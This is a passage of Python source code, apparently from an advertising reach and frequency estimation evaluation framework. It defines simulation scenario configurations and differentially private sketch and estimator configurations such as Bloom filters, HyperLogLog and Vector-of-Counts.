freq_cap=freq_cap
))),
)
return scenario_config_list
def _generate_freq_configs_scenario_3(universe_size, num_sets, set_size):
"""Generate configs of Frequency Scenario 3.
This is a stress testing, in which each publisher serves a fixed number of
impressions to every reached id.
See Frequency Scenario 3: Per-publisher frequency capping:
https://github.com/world-federation-of-advertisers/cardinality_estimation_evaluation_framework/blob/master/doc/cardinality_and_frequency_estimation_evaluation_framework.md#frequency-scenario-3-per-publisher-frequency-capping
Args:
universe_size: the universal size of reach.
num_sets: the number of sets.
set_size: size of each set, assuming they're all equal.
Returns:
A list of ScenarioConfigs of freq scenario 3 per-publisher frequency
capping.
"""
frequency_list = [2, 3, 5, 10]
scenario_config_list = []
for frequency in frequency_list:
scenario_config_list.append(
ScenarioConfig(
name='-'.join([
'publisher_constant_frequency',
'universe_size:' + str(universe_size),
'num_sets:' + str(num_sets),
'frequency:' + str(frequency),
]),
set_generator_factory=(
frequency_set_generator.PublisherConstantFrequencySetGenerator
.get_generator_factory_with_num_and_size(
universe_size=universe_size,
num_sets=num_sets,
set_size=set_size,
frequency=frequency)
)),
)
return scenario_config_list
def _complete_frequency_test_with_selected_parameters(
num_runs=NUM_RUNS_VALUE,
universe_size=FREQ_UNIVERSE_SIZE,
num_sets=NUM_SETS_VALUE_FREQ,
set_size=SET_SIZE_FOR_FREQ):
"""Generate configurations with handy selected parameters for scenarios.
This evaluation covers the frequency simulation scenarios
Args:
num_runs: the number of runs per scenario * parameter setting.
universe_size: the size of the pools from which the IDs will be selected.
num_sets: the number of sets.
set_size: reached size of each publisher, assuming all publishers have the
same size
Returns:
An EvaluationConfig.
"""
scenario_config_list = []
# Scenario 1. Homogeneous user activities within a publisher
scenario_config_list += _generate_freq_configs_scenario_1(
universe_size, num_sets, set_size)
# Scenario 2. Heterogeneous user frequency
scenario_config_list += _generate_freq_configs_scenario_2(
universe_size, num_sets, set_size)
# Scenario 3. Per-publisher frequency capping.
scenario_config_list += _generate_freq_configs_scenario_3(
universe_size, num_sets, set_size)
return EvaluationConfig(
name='complete_frequency_test_with_selected_parameters',
num_runs=num_runs,
scenario_config_list=scenario_config_list)
def _complete_test_with_selected_parameters(
num_runs=NUM_RUNS_VALUE,
universe_size=UNIVERSE_SIZE_VALUE,
num_sets=NUM_SETS_VALUE,
order=set_generator.ORDER_RANDOM,
small_set_size_rate=SMALL_REACH_RATE_VALUE,
large_set_size_rate=LARGE_REACH_RATE_VALUE,
remarketing_rate=REMARKETING_RATE_VALUE,
shared_prop_list=SHARED_PROP_LIST_VALUE):
"""Generate configurations with handy selected parameters for scenarios.
This evaluation covers the reach simulation scenarios
Args:
num_runs: the number of runs per scenario * parameter setting.
universe_size: the size of the pools from which the IDs will be selected.
num_sets: the number of sets.
user_activity_assciation: user activity association used in the Exponential
Bow model. Should be one of the defined user activity association defined
by the set_generator.USER_ACTIVITY_ASSOCIATION_XXX.
order: the order of the sets. Should be one of set_generator.ORDER_XXX.
small_set_size_rate: the reach percentage of the small reach sets.
large_set_size_rate: the reach percentage of the large reach sets.
shared_prop_list: a sequence of the shared proportion of sequentially
correlated sets.
Returns:
An EvaluationConfig.
"""
scenario_config_list = []
small_set_size = int(small_set_size_rate * universe_size)
large_set_size = int(large_set_size_rate * universe_size)
# Scenario 1. Independent publishers
scenario_config_list += _generate_configs_scenario_1_2(
universe_size, num_sets, small_set_size, large_set_size)
# Scenario 2. publishers independently serve a remarketing list
scenario_config_list += _generate_configs_scenario_1_2(
universe_size, num_sets, small_set_size, large_set_size, remarketing_rate)
# Scenario 3 (a). Exponential bow, independent user behavior.
scenario_config_list += _generate_configs_scenario_3(
universe_size, num_sets, small_set_size, large_set_size,
set_generator.USER_ACTIVITY_ASSOCIATION_INDEPENDENT)
# Scenario 3 (b). Exponential bow, identical user behavior.
scenario_config_list += _generate_configs_scenario_3(
universe_size, num_sets, small_set_size, large_set_size,
set_generator.USER_ACTIVITY_ASSOCIATION_IDENTICAL)
# Scenario 4(a). Fully-overlapped.
scenario_config_list += _generate_configs_scenario_4a(
universe_size, num_sets, small_set_size, large_set_size)
# Scenario 4(b). Subset campaigns.
scenario_config_list += _generate_configs_scenario_4b(
universe_size, num_sets, small_set_size, large_set_size, order)
# Scenario 5. Sequentially correlated campaigns
scenario_config_list += _generate_configs_scenario_5(
num_sets, small_set_size, large_set_size, order,
shared_prop_list)
return EvaluationConfig(
name='complete_test_with_selected_parameters',
num_runs=num_runs,
scenario_config_list=scenario_config_list)
def _stress_test_cardinality_global_dp(universe_size=None,
num_runs=NUM_RUNS_VALUE):
"""Stress test for cardinality estimator under global DP."""
# The universe_size argument is included to conform to the run_evaluation
# module.
_ = universe_size
scenario_config_list = []
for scenario_id, reach in enumerate(sorted(REACH_STRESS_TEST)):
scenario_config_list.append(ScenarioConfig(
name=f'{scenario_id}-reach:{reach}',
set_generator_factory=(
set_generator.DisjointSetGenerator
.get_generator_factory_with_set_size_list(
set_sizes=[reach]))))
return EvaluationConfig(
name='global_dp_stress_test',
num_runs=num_runs,
scenario_config_list=scenario_config_list)
def _frequency_end_to_end_test(universe_size=10000, num_runs=NUM_RUNS_VALUE):
"""EvaluationConfig of end-to-end test of frequency evaluation code."""
num_sets = 3
set_size = int(universe_size * REACH_RATE_FREQ_END_TO_END_TEST)
freq_rates = [1, 2, 3]
freq_cap = 5
return EvaluationConfig(
name='frequency_end_to_end_test',
num_runs=num_runs,
scenario_config_list=[
ScenarioConfig(
name='-'.join([
'subset',
'universe_size:' + str(universe_size),
'num_sets:' + str(num_sets)
]),
set_generator_factory=(
frequency_set_generator.HomogeneousMultiSetGenerator
.get_generator_factory_with_num_and_size(
universe_size=universe_size,
num_sets=num_sets,
set_size=set_size,
freq_rates=freq_rates,
freq_cap=freq_cap)))]
)
def _generate_evaluation_configs():
return (
_smoke_test,
_complete_test_with_selected_parameters,
_stress_test_cardinality_global_dp,
_frequency_end_to_end_test,
_frequency_smoke_test,
_complete_frequency_test_with_selected_parameters,
)
def get_evaluation_config(config_name):
"""Returns the evaluation config with the specified config_name."""
configs = _generate_evaluation_configs()
valid_config_names = [c().name for c in configs]
duplicate_configs = []
for i in range(len(valid_config_names)-1):
if valid_config_names[i] in valid_config_names[(i+1):]:
duplicate_configs.append(valid_config_names[i])
if duplicate_configs:
raise ValueError("Duplicate names found in evaluation configs: {}".
format(','.join(duplicate_configs)))
config = [c for c in configs if c().name == config_name]
if not config:
raise ValueError("Invalid evaluation config: {}\n"
"Valid choices are as follows: {}".format(
config_name, ','.join(valid_config_names)))
return config[0]
def _format_epsilon(dp_type, epsilon=None, decimals=EPSILON_DECIMALS):
"""Format epsilon value to string.
Args:
dp_type: one of LOCAL_DP_STR and GLOBAL_DP_STR.
epsilon: an optional differential private parameter. By default set to None.
decimals: an integer value which set the number of decimal points of the
epsilon to keep. By default, set to EPSILON_DECIMALS.
Returns:
A string representation of epsilon.
Raises:
ValueError: if dp_type is not one of 'local' and 'global'.
"""
if epsilon is None:
if dp_type == GLOBAL_DP_STR:
return NO_GLOBAL_DP_STR
elif dp_type == LOCAL_DP_STR:
return NO_LOCAL_DP_STR
else:
raise ValueError(f'dp_type should be one of "{GLOBAL_DP_STR}" and '
f'"{LOCAL_DP_STR}".')
str_format = dp_type + '_' + '{:0.' + str(decimals) + 'f}'
return str_format.format(float(epsilon))
def _format_privacy_parameters(dp_type, epsilon=None, delta=None, num_queries=1,
noise_type=None,
epsilon_decimals=EPSILON_DECIMALS,
delta_decimals=DELTA_DECIMALS):
"""Format privacy parameters to string.
Args:
dp_type: one of LOCAL_DP_STR and GLOBAL_DP_STR.
epsilon: an optional differential private parameter. By default set to None.
delta: an optional differential private parameter. By default set to None.
When delta is set, epsilon must also be set.
num_queries: the number of queries over which the privacy budget is split.
noise_type: the type of noise added. When set, must be one of GEOMETRIC_NOISE
or GAUSSIAN_NOISE.
epsilon_decimals: an integer value which set the number of decimal points of
the epsilon to keep. By default, set to EPSILON_DECIMALS.
delta_decimals: an integer value which set the number of decimal points of
the delta to keep. By default, set to DELTA_DECIMALS.
Returns:
A string representation of the given privacy parameters.
Raises:
ValueError: if dp_type is not one of 'local' and 'global', or if delta is set
without epsilon being set.
"""
if epsilon is None:
if delta is not None:
raise ValueError(f'Delta cannot be set with epsilon unset: {delta}.')
if dp_type == GLOBAL_DP_STR:
return NO_GLOBAL_DP_STR
elif dp_type == LOCAL_DP_STR:
return NO_LOCAL_DP_STR
else:
raise ValueError(f'dp_type should be one of "{GLOBAL_DP_STR}" and '
f'"{LOCAL_DP_STR}".')
epsilon_str = f'{epsilon:.{epsilon_decimals}f}'
if delta is None:
delta = 0
delta_str = f'{delta:.{delta_decimals}f}'
split_str = f'-budget_split-{num_queries}' if num_queries else ''
noise_type_str = f'-{noise_type}' if noise_type else ''
return (f'{dp_type}_{epsilon_str},{delta_str}{noise_type_str}{split_str}')
def construct_sketch_estimator_config_name(sketch_name, sketch_config,
estimator_name, sketch_epsilon=None,
estimate_epsilon=None,
estimate_delta=None,
num_estimate_queries=None,
noise_type=None,
max_frequency=None,
epsilon_decimals=EPSILON_DECIMALS,
delta_decimals=DELTA_DECIMALS):
"""Construct the name attribute for SketchEstimatorConfig.
The name will be in the format of
name_of_sketch-param_of_sketch-estimator_specification-sketch_epsilon
-estimate_epsilon[-max_frequency].
Args:
sketch_name: a string of the estimator name. Do not include dash (-).
sketch_config: a string of the sketch config. Do not include dash (-).
estimator_name: a string of the estimator name. Do not include dash (-).
sketch_epsilon: an optional differential private parameter for the sketch.
By default, set to None, i.e., not add noise to the sketch.
estimate_epsilon: an optional differential private parameter for the
estimate. By default, set to None, i.e., not add noise to the estimate.
estimate_delta: an optional differential private parameter for the
estimate. By default, set to None.
num_estimate_queries: the number of queries over which the privacy budget
for the estimate is split.
noise_type: the type of noise added to each estimate. When set, must be one
of GEOMETRIC_NOISE or GAUSSIAN_NOISE.
max_frequency: an optional maximum frequency level. If not given, will not
be added to the name.
epsilon_decimals: an integer value which set the number of decimal points of
the epsilon to keep. By default, set to EPSILON_DECIMALS.
delta_decimals: an integer value which set the number of decimal points of
the delta to keep. By default, set to DELTA_DECIMALS.
Returns:
The name of the SketchEstimatorConfig.
Raises:
AssertionError: if the input include dash (-).
"""
for s in [sketch_name, sketch_config, estimator_name]:
assert '-' not in s, f'Input should not contain "-", given {s}.'
sketch_epsilon = _format_epsilon(
LOCAL_DP_STR, epsilon=sketch_epsilon, decimals=epsilon_decimals)
if num_estimate_queries is None:
estimate_privacy_parameters = _format_epsilon(GLOBAL_DP_STR,
epsilon=estimate_epsilon,
decimals=epsilon_decimals)
else:
estimate_privacy_parameters = _format_privacy_parameters(
GLOBAL_DP_STR, epsilon=estimate_epsilon, delta=estimate_delta,
num_queries=num_estimate_queries, noise_type=noise_type,
epsilon_decimals=epsilon_decimals, delta_decimals=delta_decimals)
result = '-'.join([sketch_name, sketch_config, estimator_name, sketch_epsilon,
estimate_privacy_parameters])
if max_frequency is not None:
result = result + '-' + str(max_frequency)
return result
# Document the estimators.
def _independent_set_estimator(sketch_epsilon=None, estimate_epsilon=None):
"""Generate a SketchEstimatorConfig for the independent set estimator.
Use the Reach sketch as the underlying sketch. Set the universe size to
UNIVERSE_SIZE_VALUE.
Args:
sketch_epsilon: a differential private parameter for the sketch.
estimate_epsilon: a differential private parameter for the estimated
cardinality.
Returns:
A SketchEstimatorConfig for the independent estimator.
"""
if sketch_epsilon:
sketch_noiser = vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon)
else:
sketch_noiser = None
if estimate_epsilon:
estimate_noiser = estimator_noisers.LaplaceEstimateNoiser(
epsilon=estimate_epsilon)
else:
estimate_noiser = None
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='reach_using_voc',
sketch_config='1',
estimator_name=f'independent_estimator_universe{UNIVERSE_SIZE_VALUE}',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=estimate_epsilon),
sketch_factory=vector_of_counts.VectorOfCounts.get_sketch_factory(
num_buckets=1),
estimator=independent_set_estimator.IndependentSetEstimator(
vector_of_counts.SequentialEstimator(), UNIVERSE_SIZE_VALUE),
sketch_noiser=sketch_noiser,
estimate_noiser=estimate_noiser
)
def _hll_plus():
"""Generate a SketchEstimatorConfig for HyperLogLogPlus.
Args:
estimate_epsilon: a differential private parameter for the estimated
cardinality.
Returns:
A SketchEstimatorConfig for HyperLogLogPlus.
"""
sketch_len = 2**14
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='hyper_log_log_plus',
sketch_config=str(sketch_len),
estimator_name='hll_cardinality'),
sketch_factory=hyper_log_log.HyperLogLogPlusPlus.get_sketch_factory(
length=sketch_len),
estimator=hyper_log_log.HllCardinality(),
)
def _log_bloom_filter_first_moment_log(length, sketch_epsilon=None,
estimate_epsilon=None):
"""Generate a SketchEstimatorConfig for Log Bloom Filters.
Args:
length: the length of the log bloom filters.
sketch_epsilon: a differential private parameter for the sketch.
estimate_epsilon: a differential private parameter for the estimated
cardinality.
Returns:
A SketchEstimatorConfig for log Bloom Filters of length being 10**5.
"""
if sketch_epsilon:
sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
else:
sketch_noiser, sketch_denoiser = None, None
if estimate_epsilon:
estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
epsilon=estimate_epsilon)
else:
estimate_noiser = None
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='log_bloom_filter',
sketch_config=str(length),
estimator_name='first_moment_log',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=estimate_epsilon),
sketch_factory=bloom_filters.LogarithmicBloomFilter.get_sketch_factory(
length=length),
estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_LOG,
noiser=estimate_noiser,
denoiser=sketch_denoiser),
sketch_noiser=sketch_noiser
)
def _geo_bloom_filter_first_moment_geo(length,
sketch_epsilon=None,
estimate_epsilon=None):
"""Generate a SketchEstimatorConfig for Geometric Bloom Filters.
The length of the Geometric Bloom Filters sketch will be set to 10**4 and the
geometric distribution probability will be set to 0.0012.
Args:
sketch_epsilon: a differential private parameter for the sketch.
Returns:
A SketchEstimatorConfig for Geometric Bloom Filters of length being 10**4
and geometric distribution probability being 0.0012.
"""
if sketch_epsilon:
sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
else:
sketch_noiser, sketch_denoiser = None, None
if estimate_epsilon:
estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
epsilon=estimate_epsilon)
else:
estimate_noiser = None
probability = GEO_LENGTH_PROB_PRODUCT / length
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='geo_bloom_filter',
sketch_config=f'{length}_{probability:.6f}',
estimator_name='first_moment_geo',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=estimate_epsilon),
sketch_factory=bloom_filters.GeometricBloomFilter.get_sketch_factory(
length, probability),
estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_GEO,
noiser=estimate_noiser,
denoiser=sketch_denoiser),
sketch_noiser=sketch_noiser
)
def _bloom_filter_first_moment_estimator_uniform(length, sketch_epsilon=None,
estimate_epsilon=None):
"""Generate a SketchEstimatorConfig for Bloom Filters.
The bloom filter uses 1 hash functions.
Args:
length: the length of the bloom filter.
sketch_epsilon: a differential private parameter for the sketch.
estimate_epsilon: a differential private parameter for the estimated
cardinality.
Returns:
A SketchEstimatorConfig for Bloom Filters of with 1 hash function.
"""
if sketch_epsilon:
sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
else:
sketch_noiser, sketch_denoiser = None, None
if estimate_epsilon:
estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
epsilon=estimate_epsilon)
else:
estimate_noiser = None
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='bloom_filter',
sketch_config=str(length) + '_hash1',
estimator_name='union_estimator',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=estimate_epsilon),
sketch_factory=bloom_filters.UniformBloomFilter.get_sketch_factory(
length),
estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_UNIFORM,
noiser=estimate_noiser,
denoiser=sketch_denoiser),
sketch_noiser=sketch_noiser
)
def _exp_bloom_filter_first_moment_exp(length, sketch_epsilon=None,
estimate_epsilon=None,
estimate_delta=None,
num_estimate_queries=None,
noise_type=GEOMETRIC_NOISE,
epsilon_decimals=EPSILON_DECIMALS):
"""Generate a SketchEstimatorConfig for Exponential Bloom Filters.
The decay rate is 10.
Args:
length: the length of the exponential bloom filters.
sketch_epsilon: a differential private parameter for the sketch.
estimate_epsilon: a differential private parameter for the estimated
cardinality.
estimate_delta: an optional differential private parameter for the
estimate.
num_estimate_queries: the number of queries over which the privacy budget
for the estimate is split.
noise_type: the type of noise added to each estimate. When noise is added,
must be one of GEOMETRIC_NOISE, GAUSSIAN_NOISE or None.
epsilon_decimals: an integer value which set the number of decimal
points of the global epsilon to keep. By default, set to
EPSILON_DECIMALS.
Returns:
A SketchEstimatorConfig for Exponential Bloom Filters of with decay rate
being 10.
Raises:
ValueError: if estimate_epsilon is not None and noise_type is not one of
GEOMETRIC_NOISE or GAUSSIAN_NOISE.
"""
if sketch_epsilon:
sketch_noiser = bloom_filters.BlipNoiser(epsilon=sketch_epsilon)
sketch_denoiser = bloom_filters.SurrealDenoiser(epsilon=sketch_epsilon)
else:
sketch_noiser, sketch_denoiser = None, None
if estimate_epsilon:
if noise_type == GEOMETRIC_NOISE:
if num_estimate_queries:
estimate_epsilon_per_query = estimate_epsilon / num_estimate_queries
else:
estimate_epsilon_per_query = estimate_epsilon
estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
estimate_epsilon_per_query)
elif noise_type == GAUSSIAN_NOISE:
estimate_noiser = estimator_noisers.GaussianEstimateNoiser(
estimate_epsilon, estimate_delta, num_queries=num_estimate_queries)
else:
raise ValueError(f'noise_type should be one of "{GEOMETRIC_NOISE}" and '
f'"{GAUSSIAN_NOISE}".')
else:
estimate_noiser = None
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='exp_bloom_filter',
sketch_config=str(length) + '_10',
estimator_name='first_moment_exp',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=estimate_epsilon,
estimate_delta=estimate_delta,
num_estimate_queries=num_estimate_queries,
noise_type=noise_type,
epsilon_decimals=epsilon_decimals),
sketch_factory=bloom_filters.ExponentialBloomFilter.get_sketch_factory(
length=length, decay_rate=EXP_ADBF_DECAY_RATE),
estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_EXP,
noiser=estimate_noiser,
denoiser=sketch_denoiser),
sketch_noiser=sketch_noiser
)
LIQUID_LEGIONS_1E5_10_LN3_SEQUENTIAL = SketchEstimatorConfig(
name='liquid_legions-1e5_10-ln3-sequential',
sketch_factory=liquid_legions.LiquidLegions.get_sketch_factory(
a=10, m=10**5),
estimator=liquid_legions.SequentialEstimator(),
sketch_noiser=liquid_legions.Noiser(flip_probability=0.25))
LIQUID_LEGIONS_1E5_10_INFTY_SEQUENTIAL = SketchEstimatorConfig(
name='liquid_legions-1e5_10-infty-sequential',
sketch_factory=liquid_legions.LiquidLegions.get_sketch_factory(
a=10, m=10**5),
estimator=liquid_legions.SequentialEstimator())
def _vector_of_counts_4096_sequential(sketch_epsilon=None,
estimate_epsilon=None):
"""Generate a SketchEstimatorConfig for Vector-of-Counts.
The length of the Vector-of-Counts sketch will be set to 4096.
Args:
sketch_epsilon: a differential private parameter for the sketch.
estimate_epsilon: a differential private parameter for the estimated
cardinality.
Returns:
A SketchEstimatorConfig for Vector-of-Counts of length being 4096.
"""
if sketch_epsilon:
sketch_noiser = vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon)
else:
sketch_noiser = None
if estimate_epsilon:
estimate_noiser = estimator_noisers.LaplaceEstimateNoiser(
epsilon=estimate_epsilon)
else:
estimate_noiser = None
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='vector_of_counts',
sketch_config='4096',
estimator_name='sequential',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=estimate_epsilon),
sketch_factory=vector_of_counts.VectorOfCounts.get_sketch_factory(
num_buckets=4096),
estimator=vector_of_counts.SequentialEstimator(),
sketch_noiser=sketch_noiser,
estimate_noiser=estimate_noiser
)
def _meta_voc_for_exp_adbf(adbf_length, adbf_decay_rate, voc_length,
sketch_epsilon=None):
"""Construct Meta VoC estimator for the Exponential ADBF sketches.
Args:
adbf_length: the length of the Exp-ADBF sketch.
adbf_decay_rate: the decay rate of the Exp-ADBF sketch.
voc_length: the length of the VoC sketch.
sketch_epsilon: the local DP epsilon value. By default, set to None,
meaning that there won't be local noise used.
Returns:
A SketchEstimatorConfig for the Exp-ADBF using the Meta VoC estimator.
"""
if sketch_epsilon is None:
local_noiser = None
else:
local_noiser = vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon)
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='exp_bloom_filter',
sketch_config=f'{adbf_length}_{adbf_decay_rate}',
estimator_name=f'meta_voc_{voc_length}',
sketch_epsilon=sketch_epsilon),
sketch_factory=bloom_filters.ExponentialBloomFilter.get_sketch_factory(
length=adbf_length, decay_rate=adbf_decay_rate),
estimator=meta_estimators.MetaVectorOfCountsEstimator(
num_buckets=int(voc_length),
adbf_estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_EXP),
meta_sketch_noiser=local_noiser,
)
)
def _meta_voc_for_bf(bf_length, voc_length, sketch_epsilon=None):
"""Construct Meta VoC estimator for the Bloom Filter sketches.
Args:
bf_length: the length of the Bloom Filter sketch.
voc_length: the length of the VoC sketch.
sketch_epsilon: the local DP epsilon value. By default, set to None,
meaning that there won't be local noise used.
Returns:
A SketchEstimatorConfig for the Bloom Filter using the Meta VoC estimator.
"""
if sketch_epsilon is None:
local_noiser = None
else:
local_noiser = vector_of_counts.LaplaceNoiser(epsilon=sketch_epsilon)
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='bloom_filter',
sketch_config=f'{bf_length}',
estimator_name=f'meta_voc_{voc_length}',
sketch_epsilon=sketch_epsilon),
sketch_factory=(bloom_filters.UniformBloomFilter
.get_sketch_factory(length=int(bf_length))),
estimator=meta_estimators.MetaVectorOfCountsEstimator(
num_buckets=int(voc_length),
adbf_estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_UNIFORM),
meta_sketch_noiser=local_noiser,
)
)
def _generate_cardinality_estimator_configs():
"""Generate a tuple of cardinality estimator configs.
Returns:
A tuple of cardinality estimator configs.
"""
configs = []
# Construct configs for ADBFs with different lengths, sketch epsilon
# and estimate epsilon.
adbf_config_constructors = [
_log_bloom_filter_first_moment_log,
_exp_bloom_filter_first_moment_exp,
_geo_bloom_filter_first_moment_geo,
]
for config_constructor in adbf_config_constructors:
for length in ADBF_LENGTH_LIST:
for sketch_epsilon in SKETCH_EPSILON_VALUES:
for estimate_epsilon in ESTIMATE_EPSILON_VALUES:
configs.append(config_constructor(length, sketch_epsilon,
estimate_epsilon))
# Configs for testing global DP budget split
for length in ADBF_LENGTH_LIST:
for estimate_epsilon, estimate_delta in ESTIMATE_EPSILON_DELTA_VALUES:
for num_estimate_queries in NUM_ESTIMATE_QUERIES_VALUES:
for noise_type in [GAUSSIAN_NOISE, GEOMETRIC_NOISE]:
configs.append(_exp_bloom_filter_first_moment_exp(
length, estimate_epsilon=estimate_epsilon,
estimate_delta=estimate_delta,
num_estimate_queries=num_estimate_queries,
noise_type=noise_type))
# Construct configs for limit test under the global DP theme.
for length in ADBF_LENGTH_LIST:
for estimate_epsilon in GLOBAL_DP_LIMIT_TEST_EPSILON_VALUES:
configs.append(_exp_bloom_filter_first_moment_exp(
length, sketch_epsilon=None, estimate_epsilon=estimate_epsilon,
epsilon_decimals=EPSILON_DECIMALS_LIMIT_TEST))
# Configs of Vector-of-Counts.
for sketch_epsilon in SKETCH_EPSILON_VALUES:
for estimate_epsilon in ESTIMATE_EPSILON_VALUES:
configs.append(_vector_of_counts_4096_sequential(sketch_epsilon,
estimate_epsilon))
# Configs of independent estimator.
for sketch_epsilon in SKETCH_EPSILON_VALUES:
for estimate_epsilon in ESTIMATE_EPSILON_VALUES:
configs.append(_independent_set_estimator(sketch_epsilon,
estimate_epsilon))
# Configs of hyper-log-log-plus.
configs.append(_hll_plus())
# Configs of Meta VoC for Exp-ADBF.
for voc_length in VOC_LENGTH_LIST:
for adbf_length in ADBF_LENGTH_LIST:
for local_epsilon in SKETCH_EPSILON_VALUES:
configs.append(_meta_voc_for_exp_adbf(
adbf_length=adbf_length,
adbf_decay_rate=EXP_ADBF_DECAY_RATE,
voc_length=voc_length,
sketch_epsilon=local_epsilon))
# Configs of Meta VoC for BF.
for voc_length in VOC_LENGTH_LIST:
for bf_length in BLOOM_FILTERS_LENGTH_LIST:
for local_epsilon in SKETCH_EPSILON_VALUES:
configs.append(_meta_voc_for_bf(
bf_length=bf_length,
voc_length=voc_length,
sketch_epsilon=local_epsilon))
return tuple(configs)
def _stratiefied_sketch_vector_of_counts(max_frequency, clip, length,
sketch_epsilon=None):
"""Construct configs of StratifiedSketch based on VectorOfCounts.
Args:
max_frequency: an integer indicating the maximum frequency to estimate.
clip: a boolean indicating if or not to apply clipping for the
Vector-of-Counts sketch.
length: the length of Vector-of-Counts.
sketch_epsilon: the DP epsilon for noising the Vector-of-Counts sketch.
Returns:
A SketchEstimatorConfig for stratified sketch with Vector-of-Counts as its
base sketch.
"""
if sketch_epsilon is not None:
sketch_epsilon_float = sketch_epsilon
else:
sketch_epsilon_float = float('inf')
sketch_operator = vector_of_counts_sketch_operator.StratifiedSketchOperator(
clip=clip,
epsilon=sketch_epsilon_float,
)
clip_str = 'clip' if clip else 'no_clip'
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='stratified_sketch_vector_of_counts',
sketch_config=str(length),
estimator_name=f'sequential_{clip_str}',
sketch_epsilon=sketch_epsilon,
max_frequency=str(max_frequency)),
sketch_factory=stratified_sketch.StratifiedSketch.get_sketch_factory(
max_freq=max_frequency,
cardinality_sketch_factory=(
vector_of_counts.VectorOfCounts.get_sketch_factory(int(length))
),
noiser_class=vector_of_counts.LaplaceNoiser,
epsilon=sketch_epsilon_float,
epsilon_split=0,
union=sketch_operator.union,
),
estimator=stratified_sketch.SequentialEstimator(
sketch_operator=sketch_operator,
cardinality_estimator=vector_of_counts.SequentialEstimator(
clip=clip,
epsilon=sketch_epsilon_float,
),
),
max_frequency=max_frequency,
)
def _stratiefied_sketch_geo_adbf(
max_frequency, length, sketch_epsilon, global_epsilon,
epsilon_split=STRATIFIED_EXP_ADBF_EPSILON_SPLIT):
"""Construct configs of StratifiedSketch based on geometric ADBF.
Args:
max_frequency: an integer indicating the maximum frequency to estimate.
length: the length of geometric ADBF.
sketch_epsilon: the DP epsilon for noising the geometric ADBF sketch.
global_epsilon: the global DP epsilon parameter.
epsilon_split : Ratio of privacy budget to spend to noise 1+ sketch. When
epsilon_split=0 the 1+ sketch is created from the underlying exact set
directly. epsilon_split should be smaller than 1.
Returns:
A SketchEstimatorConfig for stratified sketch with geometric ADBF as its
base sketch.
"""
if sketch_epsilon:
sketch_epsilon_float = sketch_epsilon
# The following denoiser is used by the cardinality estimator,
# so the epsilon should be that after privacy budget (epsilon) splitting.
sketch_denoiser = bloom_filters.SurrealDenoiser(
epsilon=sketch_epsilon * epsilon_split)
else:
sketch_epsilon_float = float('inf')
sketch_denoiser = None
# Global noise.
if global_epsilon is not None:
estimate_noiser = estimator_noisers.GeometricEstimateNoiser(
epsilon=global_epsilon)
else:
estimate_noiser = None
sketch_operator = (
bloom_filter_sketch_operators.ExpectationApproximationSketchOperator(
estimation_method=bloom_filters.FirstMomentEstimator.METHOD_GEO))
probability = GEO_LENGTH_PROB_PRODUCT / length
return SketchEstimatorConfig(
name=construct_sketch_estimator_config_name(
sketch_name='stratified_sketch_geo_adbf',
sketch_config=f'{length}_{probability:.6f}',
estimator_name='first_moment_estimator_geo_expectation',
sketch_epsilon=sketch_epsilon,
estimate_epsilon=global_epsilon,
max_frequency=str(max_frequency)),
sketch_factory=stratified_sketch.StratifiedSketch.get_sketch_factory(
max_freq=max_frequency,
cardinality_sketch_factory=(
bloom_filters.GeometricBloomFilter.get_sketch_factory(
length=length, probability=probability)
),
noiser_class=bloom_filters.BlipNoiser,
epsilon=sketch_epsilon_float,
epsilon_split=epsilon_split,
union=sketch_operator.union,
),
estimator=stratified_sketch.SequentialEstimator(
sketch_operator=sketch_operator,
cardinality_estimator=bloom_filters.FirstMomentEstimator(
method=bloom_filters.FirstMomentEstimator.METHOD_GEO,
denoiser=sketch_denoiser,
noiser=estimate_noiser,
),
),
max_frequency=max_frequency,
)
def _stratiefied_sketch_exponential_adbf(
max_frequency, length, sketch_epsilon, global_epsilon,
sketch_operator_type,
epsilon_split=STRATIFIED_EXP_ADBF_EPSILON_SPLIT):
"""Construct configs of StratifiedSketch based on Exponential ADBF.
Args:
max_frequency: an integer indicating the maximum frequency to estimate.
length: the length of Exponential ADBF.
sketch_epsilon: the DP epsilon for noising the Exponential ADBF sketch.
global_epsilon: the global DP epsilon parameter.
sketch_operator_type: one of 'bayesian' and 'expectation'.
